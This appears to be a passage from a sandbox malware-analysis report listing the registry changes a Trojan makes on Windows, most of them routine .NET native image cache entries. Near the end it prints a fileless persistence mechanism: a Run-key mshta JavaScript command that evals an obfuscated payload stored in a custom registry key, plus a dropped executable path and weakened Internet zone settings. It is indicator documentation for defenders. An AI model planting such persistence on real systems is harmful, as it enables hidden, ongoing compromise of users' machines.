"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 B7 83 50 EF BF ED 23 59 86 2D 41 F4 1A 34 C4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4D 6D 00 FD F4 D5 28 53 D9 CB 8D 45 C2 6C 6D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "C8 72 10 C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:3484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 AE 1D EF 6C 2D 88 D8 76 C0 1D 10 D7 D2 5E E6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 00 35 84 DF A4 99 38 7B 60 2A D5 07 4D C9 EB"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "2C BB 9A C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 38 81 A1 6C C7 C9 19 E6 64 2E 68 D9 A2 6B 20"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "44 C8 29 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "B8 14 B1 BF AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 27 1B FE ED E6 AE 9E E4 D6 4F B9 AA 92 DA 70"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 CD 79 1E C6 15 7A 89 BF B0 25 7A 2D 1E 6F F6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 25 DD 5E 6E 4B B4 85 04 B3 3B 26 95 D9 C9 97"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "1A 26 E3 BF AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process regsvr32.exe:3384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 61 CF CB 61 1C 26 88 90 15 8E 95 57 35 E8 DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process regsvr32.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:nGqU8fhUg5=Fh69Ffs;r49L=new ActiveXObject(WScript.Shell);fZR7QqjRn3=8Sz6E;I2tCE2=r49L.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);zOYw9cby=4io;eval(I2tCE2);jXFqs0MMa=Ua;o."

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"
"5232108f" = "ÈwûFª2°p~,¤eÅ’@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK<ÃŽ«8GÝt9mFù„zËœ-ßô‚]ꨧÖ×mà`fhêç‡/«hÜ°remIèÑyDÈ6 ˆŸG”ô?1ËœußXV@@¿°2iVT©Ðãà¯ÉÛ)ŠÕ9NÅ“J:4Ã’Å m¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&”š®Ø©(;°REø¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGÝ¡=ž=B±‡uÕµyáC91wo{¢Aû8oò¨Æ’@‹^×Ádð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûŠ¦YÙ]½oes¶‹´"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

